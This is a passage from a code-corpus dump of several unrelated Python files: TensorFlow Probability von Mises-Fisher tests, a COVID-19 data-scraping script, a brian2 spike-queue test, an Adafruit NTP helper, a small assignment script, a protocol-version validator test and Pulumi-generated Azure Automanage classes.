tf.test.TestCase):
def testBesselIve(self):
self.assertRaises(ValueError, lambda: _bessel_ive(2.0, 1.0))
# Zero is not a supported value for z.
self.assertRaises(tf.errors.InvalidArgumentError,
lambda: self.evaluate(_bessel_ive(1.5, 0.0)))
z = np.logspace(-6, 2, 20).astype(np.float64)
for v in np.float64([-0.5, 0, 0.5, 1, 1.5]):
try:
from scipy import special # pylint:disable=g-import-not-at-top
except ImportError:
tf.compat.v1.logging.warn('Skipping scipy-dependent tests')
return
self.assertAllClose(special.ive(v, z), _bessel_ive(v, z))
def testSampleMeanDir2d(self):
mean_dirs = tf.nn.l2_normalize([[1., 1],
[-2, 1],
[0, -1]], axis=-1)
concentration = [[0], [0.1], [2], [40], [1000]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dirs,
concentration=concentration,
validate_args=True,
allow_nan_stats=False)
self.assertEqual([5, 3], vmf.batch_shape.as_list())
self.assertEqual([2], vmf.event_shape.as_list())
nsamples = 12000
samples = vmf.sample(sample_shape=[nsamples])
self.assertEqual([nsamples, 5, 3, 2], samples.shape.as_list())
sample_mean = self.evaluate(samples).mean(axis=0)
# Assert that positive-concentration distributions have samples with
# the expected mean direction.
sample_dir = (
sample_mean / np.linalg.norm(sample_mean, axis=-1, keepdims=True))
inner_product = self.evaluate(
tf.reduce_sum(input_tensor=sample_dir * vmf.mean_direction, axis=-1))
# All except the 0-concentration distribution should have >0 inner product
# with the mean direction of the distribution.
self.assertAllGreater(inner_product[1:], 0.1)
# Pick out >1 concentration distributions to assert ~1 inner product with
# mean direction.
self.assertAllClose(np.ones_like(inner_product)[2:], inner_product[2:],
atol=1e-3)
# Inner products should be roughly ascending by concentration.
self.assertAllEqual(np.round(np.sort(inner_product, axis=0), decimals=3),
np.round(inner_product, decimals=3))
means = self.evaluate(vmf.mean())
# Mean vector for 0-concentration is precisely (0, 0).
self.assertAllEqual(np.zeros_like(means[0]), means[0])
mean_lengths = np.linalg.norm(means, axis=-1)
# Length of the mean vector is strictly ascending with concentration.
self.assertAllEqual(mean_lengths, np.sort(mean_lengths, axis=0))
self.assertAllClose(np.linalg.norm(sample_mean, axis=-1), mean_lengths,
atol=0.02)
def testSampleMeanDir3d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3],
[-2, -3, -1]], axis=-1)
concentration = [[0], [0.1], [2], [40], [1000]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir,
concentration=concentration,
validate_args=True,
allow_nan_stats=False)
self.assertEqual([5, 2], vmf.batch_shape.as_list())
self.assertEqual([3], vmf.event_shape.as_list())
nsamples = int(2e4)
samples = vmf.sample(sample_shape=[nsamples])
self.assertEqual([nsamples, 5, 2, 3], samples.shape.as_list())
sample_mean = self.evaluate(samples).mean(axis=0)
# Assert that positive-concentration distributions have samples with
# the expected mean direction.
sample_dir = (
sample_mean / np.linalg.norm(sample_mean, axis=-1, keepdims=True))
inner_product = self.evaluate(
tf.reduce_sum(input_tensor=sample_dir * vmf.mean_direction, axis=-1))
# All except the 0-concentration distribution should have >0 inner product
# with the mean direction of the distribution.
self.assertAllGreater(inner_product[1:], 0.1)
# Pick out >1 concentration distributions to assert ~1 inner product with
# mean direction.
self.assertAllClose(np.ones_like(inner_product)[2:], inner_product[2:],
atol=1e-3)
# Inner products should be roughly ascending by concentration.
self.assertAllEqual(np.round(np.sort(inner_product, axis=0), decimals=3),
np.round(inner_product, decimals=3))
means = self.evaluate(vmf.mean())
# Mean vector for 0-concentration is precisely (0, 0, 0).
self.assertAllEqual(np.zeros_like(means[0]), means[0])
mean_lengths = np.linalg.norm(means, axis=-1)
# Length of the mean vector is strictly ascending with concentration.
self.assertAllEqual(mean_lengths, np.sort(mean_lengths, axis=0))
self.assertAllClose(np.linalg.norm(sample_mean, axis=-1), mean_lengths,
atol=0.02)
def _verifyPdfWithNumpy(self, vmf, atol=1e-4):
"""Verifies log_prob evaluations with numpy/scipy.
Both uniform random points and sampled points are evaluated.
Args:
vmf: A `tfp.distributions.VonMisesFisher` instance.
atol: Absolute difference tolerable.
"""
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 10
# Sample some random points uniformly over the hypersphere using numpy.
sample_shape = [nsamples] + vmf.batch_shape.as_list() + [dim]
uniforms = np.random.randn(*sample_shape)
uniforms /= np.linalg.norm(uniforms, axis=-1, keepdims=True)
uniforms = uniforms.astype(vmf.dtype.as_numpy_dtype)
# Concatenate in some sampled points from the distribution under test.
samples = tf.concat([uniforms, vmf.sample(sample_shape=[nsamples])], axis=0)
samples = tf.debugging.check_numerics(samples, 'samples')
samples = self.evaluate(samples)
log_prob = vmf.log_prob(samples)
log_prob = tf.debugging.check_numerics(log_prob, 'log_prob')
try:
from scipy.special import gammaln # pylint: disable=g-import-not-at-top
from scipy.special import ive # pylint: disable=g-import-not-at-top
except ImportError:
tf.compat.v1.logging.warn('Unable to use scipy in tests')
return
conc = self.evaluate(vmf.concentration)
mean_dir = self.evaluate(vmf.mean_direction)
log_true_sphere_surface_area = (
np.log(2) + (dim / 2) * np.log(np.pi) - gammaln(dim / 2))
expected = (
conc * np.sum(samples * mean_dir, axis=-1) +
np.where(conc > 0,
(dim / 2 - 1) * np.log(conc) -
(dim / 2) * np.log(2 * np.pi) -
np.log(ive(dim / 2 - 1, conc)) -
np.abs(conc),
-log_true_sphere_surface_area))
self.assertAllClose(expected, self.evaluate(log_prob),
atol=atol)
def _verifySampleAndPdfConsistency(self, vmf, rtol=0.075):
"""Verifies samples are consistent with the PDF using importance sampling.
In particular, we verify an estimate the surface area of the n-dimensional
hypersphere, and the surface areas of the spherical caps demarcated by
a handful of survival rates.
Args:
vmf: A `VonMisesFisher` distribution instance.
rtol: Relative difference tolerable.
"""
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 50000
samples = vmf.sample(sample_shape=[nsamples])
samples = tf.debugging.check_numerics(samples, 'samples')
log_prob = vmf.log_prob(samples)
log_prob = tf.debugging.check_numerics(log_prob, 'log_prob')
log_importance = -log_prob
sphere_surface_area_estimate, samples, importance, conc = self.evaluate([
tf.exp(
tf.reduce_logsumexp(input_tensor=log_importance, axis=0) -
tf.math.log(tf.cast(nsamples, dtype=tf.float32))), samples,
tf.exp(log_importance), vmf.concentration
])
true_sphere_surface_area = 2 * (np.pi)**(dim / 2) * self.evaluate(
tf.exp(-tf.math.lgamma(dim / 2)))
# Broadcast to correct size
true_sphere_surface_area += np.zeros_like(sphere_surface_area_estimate)
# Highly concentrated distributions do not get enough coverage to provide
# a reasonable full-sphere surface area estimate. These are covered below
# by CDF-based hypersphere cap surface area estimates.
self.assertAllClose(
true_sphere_surface_area[np.where(conc < 3)],
sphere_surface_area_estimate[np.where(conc < 3)],
rtol=rtol)
# Assert surface area of hyperspherical cap For some CDFs in [.05,.45],
# (h must be greater than 0 for the hypersphere cap surface area
# calculation to hold).
for survival_rate in 0.95, .9, .75, .6:
cdf = (1 - survival_rate)
mean_dir = self.evaluate(vmf.mean_direction)
dotprods = np.sum(samples * mean_dir, -1)
# Empirical estimate of the effective dot-product of the threshold that
# selects for a given CDF level, that is the cosine of the largest
# passable angle, or the minimum cosine for a within-CDF sample.
dotprod_thresh = np.percentile(
dotprods, 100 * survival_rate, axis=0, keepdims=True)
dotprod_above_thresh = np.float32(dotprods > dotprod_thresh)
sphere_cap_surface_area_ests = (
cdf * (importance * dotprod_above_thresh).sum(0) /
dotprod_above_thresh.sum(0))
h = (1 - dotprod_thresh)
self.assertGreaterEqual(h.min(), 0) # h must be >= 0 for the eqn below
true_sphere_cap_surface_area = (
0.5 * true_sphere_surface_area *
self.evaluate(tf.math.betainc((dim - 1) / 2, 0.5, 2 * h - h**2)))
if dim == 3: # For 3-d we have a simpler form we can double-check.
self.assertAllClose(2 * np.pi * h, true_sphere_cap_surface_area)
self.assertAllClose(
true_sphere_cap_surface_area,
sphere_cap_surface_area_ests +
np.zeros_like(true_sphere_cap_surface_area),
rtol=rtol)
def _verifyCovariance(self, vmf):
dim = tf.compat.dimension_value(vmf.event_shape[-1])
nsamples = 10000
samples = vmf.sample(nsamples)
samples = tf.debugging.check_numerics(samples, 'samples')
cov = vmf.covariance()
samples, cov = self.evaluate([samples, cov])
batched_samples = np.reshape(samples, [nsamples, -1, dim])
batch_size = batched_samples.shape[1]
est_cov = np.zeros([batch_size, dim, dim], dtype=cov.dtype)
for bi in range(batched_samples.shape[1]):
est_cov[bi] = np.cov(batched_samples[:, bi], rowvar=False)
self.assertAllClose(
np.reshape(est_cov, cov.shape),
cov,
atol=0.015)
def testSampleAndPdfConsistency2d(self):
mean_dir = tf.nn.l2_normalize([[1., 2],
[-2, -3]], axis=-1)
concentration = [[0], [1e-5], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
def testSampleAndPdfConsistency3d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3],
[-2, -3, -1]], axis=-1)
concentration = [[0], [1e-5], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf, atol=.002)
def testSampleAndPdfConsistency4d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3, 4],
[-2, -3, -1, 0]], axis=-1)
concentration = [[0], [1e-4], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
def testSampleAndPdfConsistency5d(self):
mean_dir = tf.nn.l2_normalize([[1., 2, 3, 4, 5],
[-2, -3, -1, 0, 1]], axis=-1)
# TODO(bjp): Numerical instability 0 < k < 1e-2 concentrations.
# Should resolve by eliminating the bessel_i recurrence in favor of
# a more stable algorithm, e.g. cephes.
concentration = [[0], [5e-2], [0.1], [1], [10]]
vmf = tfp.distributions.VonMisesFisher(
mean_direction=mean_dir, concentration=concentration,
validate_args=True, allow_nan_stats=False)
self._verifySampleAndPdfConsistency(vmf)
# TODO(bjp): Enable self._verifyCovariance(vmf)
self._verifyPdfWithNumpy(vmf)
if __name__ == '__main__':
tf.test.main()
|
py | 1a4a2404ab3ce6b68a768a4c2b54d82e2c0ad1b3 | """
scanner
scan the COVID-19 government sites
data is fetched and cleaned then pushed to a git repo
files are only updated if the cleaned version changes
"""
from argparse import ArgumentParser, Namespace, RawDescriptionHelpFormatter
import configparser
import sys
import os
from datetime import datetime, timezone, timedelta
import time
from loguru import logger
from typing import List, Dict, Tuple
from data_pipeline import DataPipeline, DataPipelineConfig
from specialized_capture import SpecializedCapture, special_cases
from util import get_host
import udatetime
import util_git
# ----------------------
parser = ArgumentParser(
description=__doc__,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument(
'-f', '--format', dest='format_html', action='store_true', default=False,
help='run the html formater (only)')
parser.add_argument(
'-c', '--clean', dest='clean_html', action='store_true', default=False,
help='run the html cleaner (only)')
parser.add_argument(
'-x', '--extract', dest='extract_html', action='store_true', default=False,
help='run the html extractor (only)')
parser.add_argument('--trace', dest='trace', action='store_true', default=False,
help='turn on tracing')
parser.add_argument('-a', '--auto_push', dest='auto_push', action='store_true', default=False,
help='checkin data to the git repo at end of run')
parser.add_argument('--rerun_now', dest='rerun_now', action='store_true', default=False,
help='include items that were fetched in the last 15 minutes')
parser.add_argument('--continuous', dest='continuous', action='store_true', default=False,
help='Run at 0:05 and 0:35')
parser.add_argument('--auto_update', dest='auto_update', action='store_true', default=False,
help='Pull changes and restart if source has changed')
parser.add_argument('--guarded', dest='guarded', action='store_true', default=False)
parser.add_argument('--firefox', dest='use_firefox', action='store_true', default=False,
help='capture using firefox')
parser.add_argument('--chrome', dest='use_chrome', action='store_true', default=False,
help='capture using chrome')
parser.add_argument('--show_browser', dest='show_browser', action='store_true', default=False,
help='show browser while running')
parser.add_argument('-i', '--image', dest='capture_image', action='store_true', default=False,
help='capture image after each change')
# data dir args
config = configparser.ConfigParser()
if os.path.exists("data_pipeline.local.ini"):
config.read('data_pipeline.local.ini')
elif os.path.exists("data_pipeline.ini"):
config.read('data_pipeline.ini')
else:
raise Exception("Missing data_pipeline.ini file")
parser.add_argument(
'--base_dir',
default=config["DIRS"]["base_dir"],
help='Local GitHub repo dir for corona19-data-archive')
parser.add_argument(
'--temp_dir',
default=config["DIRS"]["temp_dir"],
help='Local temp dir for snapshots')
# ----
def next_time() -> datetime:
t = datetime.now()
xmin = t.minute
if xmin < 25:
xmin = 35
elif xmin < 55:
t = t + timedelta(hours=1)
xmin = 5
else:
t = t + timedelta(hours=1)
xmin = 35
t = datetime(t.year, t.month, t.day, t.hour, xmin, 0)
return t
def init_specialized_capture(args: Namespace) -> SpecializedCapture:
temp_dir = args.temp_dir
publish_dir = os.path.join(args.base_dir, "captive-browser")
capture = SpecializedCapture(temp_dir, publish_dir)
return capture
def run_continuous(scanner: DataPipeline, capture: SpecializedCapture, auto_push: bool):
if util_git.monitor_check(): return
host = get_host()
try:
print("starting continuous run")
scanner.update_sources()
scanner.process()
if capture:
try:
special_cases(capture)
except Exception as ex:
logger.error(ex)
logger.error("*** continue after exception in specialized capture")
if auto_push: util_git.push(scanner.config.base_dir, f"{udatetime.to_logformat(scanner.change_list.start_date)} on {host}")
if util_git.monitor_check(): return
cnt = 1
t = next_time()
print(f"sleep until {t}")
while True:
time.sleep(15)
if datetime.now() < t: continue
if util_git.monitor_check(): break
print("==================================")
print(f"=== run {cnt} at {t}")
print("==================================")
try:
scanner.update_sources()
scanner.process()
if capture: special_cases(capture)
if auto_push: util_git.push(scanner.config.base_dir, f"{udatetime.to_displayformat(scanner.change_list.start_date)} on {host}")
except Exception as ex:
logger.exception(ex)
print(f"run failed, wait 5 minutes and try again")
t = t + timedelta(minutes=5)
print("==================================")
print("")
t = next_time()
print(f"sleep until {t}")
cnt += 1
finally:
if capture: capture.close()
def run_once(scanner: DataPipeline, auto_push: bool):
scanner.update_sources()
scanner.process()
if auto_push:
host = get_host()
util_git.push(scanner.config.base_dir, f"{udatetime.to_logformat(scanner.change_list.start_date)} on {host}")
def main(args_list=None):
if args_list is None:
args_list = sys.argv[1:]
args = parser.parse_args(args_list)
if args.auto_update:
return util_git.monitor_start("--auto_update")
if not args.auto_push:
logger.warning("github push is DISABLED")
config = DataPipelineConfig(args.base_dir, args.temp_dir, flags = {
"trace": args.trace,
"capture_image": args.capture_image,
"rerun_now": args.rerun_now,
"firefox": args.use_firefox,
"chrome": args.use_chrome,
"headless": not args.show_browser,
})
scanner = DataPipeline(config)
capture = init_specialized_capture(args)
if args.clean_html or args.extract_html or args.format_html:
if args.format_html: scanner.format_html(rerun=True)
if args.clean_html: scanner.clean_html(rerun=True)
if args.extract_html: scanner.extract_html(rerun=True)
elif args.continuous:
scanner.format_html()
scanner.clean_html()
scanner.extract_html()
run_continuous(scanner, capture, auto_push = args.auto_push)
else:
scanner.format_html()
scanner.clean_html()
scanner.extract_html()
run_once(scanner, args.auto_push)
if __name__ == "__main__":
main()
|
py | 1a4a26eafca4575c8aafa1ced0c487bd7e21b012 | import numpy as np
from numpy.testing.utils import assert_equal
from brian2.synapses.spikequeue import SpikeQueue
from brian2.units.stdunits import ms
from brian2.memory.dynamicarray import DynamicArray1D
def create_all_to_all(N):
'''
Return a tuple containing `synapses` and `delays` in the form that is needed
for the `SpikeQueue` initializer.
Every synapse has a delay depending on the presynaptic neuron.
'''
data = np.repeat(np.arange(N), N)
delays = DynamicArray1D(data.shape, dtype=np.int32)
delays[:] = data
synapses = [DynamicArray1D(N, dtype=np.int32) for _ in xrange(N)]
for i in xrange(N):
synapses[i][:] = np.arange(N) + i*N
return synapses, delays
def create_one_to_one(N):
'''
Return a tuple containing `synapses` and `delays` in the form that is needed
for the `SpikeQueue` initializer.
Every synapse has a delay depending on the presynaptic neuron.
'''
data = np.arange(N)
delays = DynamicArray1D(data.shape, dtype=np.int32)
delays[:] = data
data = np.arange(N)
synapses = [DynamicArray1D(1, dtype=np.int32) for _ in xrange(N)]
for i in xrange(N):
synapses[i][:] = i
return synapses, delays
def test_spikequeue():
N = 100
synapses, delays = create_one_to_one(N)
queue = SpikeQueue()
queue.compress(delays, synapses, N)
queue.push(np.arange(N, dtype=np.int32), delays)
for i in xrange(N):
assert_equal(queue.peek(), np.array([i]))
queue.next()
for i in xrange(N):
assert_equal(queue.peek(), np.array([]))
queue.next()
synapses, delays = create_all_to_all(N)
queue = SpikeQueue()
queue.compress(delays, synapses, N*N)
queue.push(np.arange(N*N, dtype=np.int32), delays)
for i in xrange(N):
assert_equal(queue.peek(), i*N + np.arange(N))
queue.next()
for i in xrange(N):
assert_equal(queue.peek(), np.array([]))
queue.next()
if __name__ == '__main__':
test_spikequeue()
|
py | 1a4a27ab5774b0aa1a67d9b121bb480f64c2ab4f | # The MIT License (MIT)
#
# Copyright (c) 2019 Brent Rubell for Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_ntp`
================================================================================
Network Time Protocol (NTP) helper for CircuitPython
* Author(s): Brent Rubell
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
import time
import rtc
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_NTP.git"
class NTP:
"""Network Time Protocol (NTP) helper module for CircuitPython.
This module does not handle daylight savings or local time.
:param adafruit_esp32spi esp: ESP32SPI object.
"""
def __init__(self, esp):
# Verify ESP32SPI module
if "ESP_SPIcontrol" in str(type(esp)):
self._esp = esp
else:
raise TypeError("Provided object is not an ESP_SPIcontrol object.")
self.valid_time = False
def set_time(self, tz_offset=0):
"""Fetches and sets the microcontroller's current time
in seconds since since Jan 1, 1970.
:param int tz_offset: Timezone offset from GMT
"""
try:
now = self._esp.get_time()
now = time.localtime(now[0] + (tz_offset * 3600)) # 3600 seconds in an hour
rtc.RTC().datetime = now
self.valid_time = True
except ValueError as error:
print(str(error))
return
|
py | 1a4a2861358001c2a9bd95afb720b8b5bd89a2d5 | from random import randint
import sys
RANDOM_NUMS = []
class Assign:
def assign(self, number, some_member, member_list):
for item in member_list:
if number == item.assignee:
continue
some_member.assignee = number
break
def assign_nums(self, member_list):
for member in member_list:
count = 0
random_num = randint(0, len(member_list) - 1)
while random_num in RANDOM_NUMS or random_num == member_list.index(member):
random_num = randint(0, len(member_list) - 1)
if count == 3:
print("Loop failed, try again!")
sys.exit()
count += 1
RANDOM_NUMS.append(random_num)
count -= count
Assign.assign(random_num, member, member_list) |
py | 1a4a2886c82e4bf353017599bf6b9440d53dfaf7 | from plenum.common.messages.fields import ProtocolVersionField
from plenum.common.plenum_protocol_version import PlenumProtocolVersion
validator = ProtocolVersionField()
def test_valid():
assert not validator.validate(1)
assert not validator.validate(PlenumProtocolVersion.STATE_PROOF_SUPPORT.value)
assert not validator.validate(None) # version can be None (for backward compatibility)
def test_invalid():
assert validator.validate(2)
assert validator.validate("1")
assert validator.validate("")
assert validator.validate(0)
assert validator.validate(1.0)
assert validator.validate(0.1)
|
py | 1a4a2989dc8b607e64a614936ef74ea67d3bd5ac | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from ._enums import *
__all__ = [
'AccountIdentityArgs',
'ConfigurationProfileAssignmentPropertiesArgs',
'ConfigurationProfilePreferenceAntiMalwareArgs',
'ConfigurationProfilePreferencePropertiesArgs',
'ConfigurationProfilePreferenceVmBackupArgs',
]
@pulumi.input_type
class AccountIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
Identity for the Automanage account.
:param pulumi.Input['ResourceIdentityType'] type: The type of identity used for the Automanage account. Currently, the only supported type is 'SystemAssigned', which implicitly creates an identity.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The type of identity used for the Automanage account. Currently, the only supported type is 'SystemAssigned', which implicitly creates an identity.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ConfigurationProfileAssignmentPropertiesArgs:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[str]] = None,
configuration_profile: Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]] = None,
configuration_profile_preference_id: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None):
"""
Automanage configuration profile assignment properties.
:param pulumi.Input[str] account_id: The Automanage account ARM Resource URI
:param pulumi.Input[Union[str, 'ConfigurationProfile']] configuration_profile: A value indicating configuration profile.
:param pulumi.Input[str] configuration_profile_preference_id: The configuration profile custom preferences ARM resource URI
:param pulumi.Input[str] target_id: The target VM resource URI
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if configuration_profile is not None:
pulumi.set(__self__, "configuration_profile", configuration_profile)
if configuration_profile_preference_id is not None:
pulumi.set(__self__, "configuration_profile_preference_id", configuration_profile_preference_id)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[str]]:
"""
The Automanage account ARM Resource URI
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="configurationProfile")
def configuration_profile(self) -> Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]]:
"""
A value indicating configuration profile.
"""
return pulumi.get(self, "configuration_profile")
@configuration_profile.setter
def configuration_profile(self, value: Optional[pulumi.Input[Union[str, 'ConfigurationProfile']]]):
pulumi.set(self, "configuration_profile", value)
@property
@pulumi.getter(name="configurationProfilePreferenceId")
def configuration_profile_preference_id(self) -> Optional[pulumi.Input[str]]:
"""
The configuration profile custom preferences ARM resource URI
"""
return pulumi.get(self, "configuration_profile_preference_id")
@configuration_profile_preference_id.setter
def configuration_profile_preference_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "configuration_profile_preference_id", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
The target VM resource URI
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@pulumi.input_type
class ConfigurationProfilePreferenceAntiMalwareArgs:
def __init__(__self__, *,
enable_real_time_protection: Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]] = None,
exclusions: Optional[Any] = None,
run_scheduled_scan: Optional[pulumi.Input[Union[str, 'RunScheduledScan']]] = None,
scan_day: Optional[pulumi.Input[str]] = None,
scan_time_in_minutes: Optional[pulumi.Input[str]] = None,
scan_type: Optional[pulumi.Input[Union[str, 'ScanType']]] = None):
"""
Automanage configuration profile Antimalware preferences.
:param pulumi.Input[Union[str, 'EnableRealTimeProtection']] enable_real_time_protection: Enables or disables Real Time Protection
:param Any exclusions: Extensions, Paths and Processes that must be excluded from scan
:param pulumi.Input[Union[str, 'RunScheduledScan']] run_scheduled_scan: Enables or disables a periodic scan for antimalware
:param pulumi.Input[str] scan_day: Schedule scan settings day
:param pulumi.Input[str] scan_time_in_minutes: Schedule scan settings time
:param pulumi.Input[Union[str, 'ScanType']] scan_type: Type of scheduled scan
"""
if enable_real_time_protection is not None:
pulumi.set(__self__, "enable_real_time_protection", enable_real_time_protection)
if exclusions is not None:
pulumi.set(__self__, "exclusions", exclusions)
if run_scheduled_scan is not None:
pulumi.set(__self__, "run_scheduled_scan", run_scheduled_scan)
if scan_day is not None:
pulumi.set(__self__, "scan_day", scan_day)
if scan_time_in_minutes is not None:
pulumi.set(__self__, "scan_time_in_minutes", scan_time_in_minutes)
if scan_type is not None:
pulumi.set(__self__, "scan_type", scan_type)
@property
@pulumi.getter(name="enableRealTimeProtection")
def enable_real_time_protection(self) -> Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]]:
"""
Enables or disables Real Time Protection
"""
return pulumi.get(self, "enable_real_time_protection")
@enable_real_time_protection.setter
def enable_real_time_protection(self, value: Optional[pulumi.Input[Union[str, 'EnableRealTimeProtection']]]):
pulumi.set(self, "enable_real_time_protection", value)
@property
@pulumi.getter
def exclusions(self) -> Optional[Any]:
"""
Extensions, Paths and Processes that must be excluded from scan
"""
return pulumi.get(self, "exclusions")
@exclusions.setter
def exclusions(self, value: Optional[Any]):
pulumi.set(self, "exclusions", value)
@property
@pulumi.getter(name="runScheduledScan")
def run_scheduled_scan(self) -> Optional[pulumi.Input[Union[str, 'RunScheduledScan']]]:
"""
Enables or disables a periodic scan for antimalware
"""
return pulumi.get(self, "run_scheduled_scan")
@run_scheduled_scan.setter
def run_scheduled_scan(self, value: Optional[pulumi.Input[Union[str, 'RunScheduledScan']]]):
pulumi.set(self, "run_scheduled_scan", value)
@property
@pulumi.getter(name="scanDay")
def scan_day(self) -> Optional[pulumi.Input[str]]:
"""
Schedule scan settings day
"""
return pulumi.get(self, "scan_day")
@scan_day.setter
def scan_day(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scan_day", value)
@property
@pulumi.getter(name="scanTimeInMinutes")
def scan_time_in_minutes(self) -> Optional[pulumi.Input[str]]:
"""
Schedule scan settings time
"""
return pulumi.get(self, "scan_time_in_minutes")
@scan_time_in_minutes.setter
def scan_time_in_minutes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scan_time_in_minutes", value)
@property
@pulumi.getter(name="scanType")
def scan_type(self) -> Optional[pulumi.Input[Union[str, 'ScanType']]]:
"""
Type of scheduled scan
"""
return pulumi.get(self, "scan_type")
@scan_type.setter
def scan_type(self, value: Optional[pulumi.Input[Union[str, 'ScanType']]]):
pulumi.set(self, "scan_type", value)
@pulumi.input_type
class ConfigurationProfilePreferencePropertiesArgs:
def __init__(__self__, *,
anti_malware: Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']] = None,
vm_backup: Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']] = None):
"""
Automanage configuration profile preference properties.
:param pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs'] anti_malware: The custom preferences for Azure Antimalware.
:param pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs'] vm_backup: The custom preferences for Azure VM Backup.
"""
if anti_malware is not None:
pulumi.set(__self__, "anti_malware", anti_malware)
if vm_backup is not None:
pulumi.set(__self__, "vm_backup", vm_backup)
@property
@pulumi.getter(name="antiMalware")
def anti_malware(self) -> Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']]:
"""
The custom preferences for Azure Antimalware.
"""
return pulumi.get(self, "anti_malware")
@anti_malware.setter
def anti_malware(self, value: Optional[pulumi.Input['ConfigurationProfilePreferenceAntiMalwareArgs']]):
pulumi.set(self, "anti_malware", value)
@property
@pulumi.getter(name="vmBackup")
def vm_backup(self) -> Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']]:
"""
The custom preferences for Azure VM Backup.
"""
return pulumi.get(self, "vm_backup")
@vm_backup.setter
def vm_backup(self, value: Optional[pulumi.Input['ConfigurationProfilePreferenceVmBackupArgs']]):
pulumi.set(self, "vm_backup", value)
@pulumi.input_type
class ConfigurationProfilePreferenceVmBackupArgs:
def __init__(__self__, *,
instant_rp_retention_range_in_days: Optional[pulumi.Input[int]] = None,
retention_policy: Optional[pulumi.Input[str]] = None,
schedule_policy: Optional[pulumi.Input[str]] = None,
time_zone: Optional[pulumi.Input[str]] = None):
"""
Automanage configuration profile VM Backup preferences.
:param pulumi.Input[int] instant_rp_retention_range_in_days: Instant RP retention policy range in days
:param pulumi.Input[str] retention_policy: Retention policy with the details on backup copy retention ranges.
:param pulumi.Input[str] schedule_policy: Backup schedule specified as part of backup policy.
:param pulumi.Input[str] time_zone: TimeZone optional input as string. For example: Pacific Standard Time
"""
if instant_rp_retention_range_in_days is not None:
pulumi.set(__self__, "instant_rp_retention_range_in_days", instant_rp_retention_range_in_days)
if retention_policy is not None:
pulumi.set(__self__, "retention_policy", retention_policy)
if schedule_policy is not None:
pulumi.set(__self__, "schedule_policy", schedule_policy)
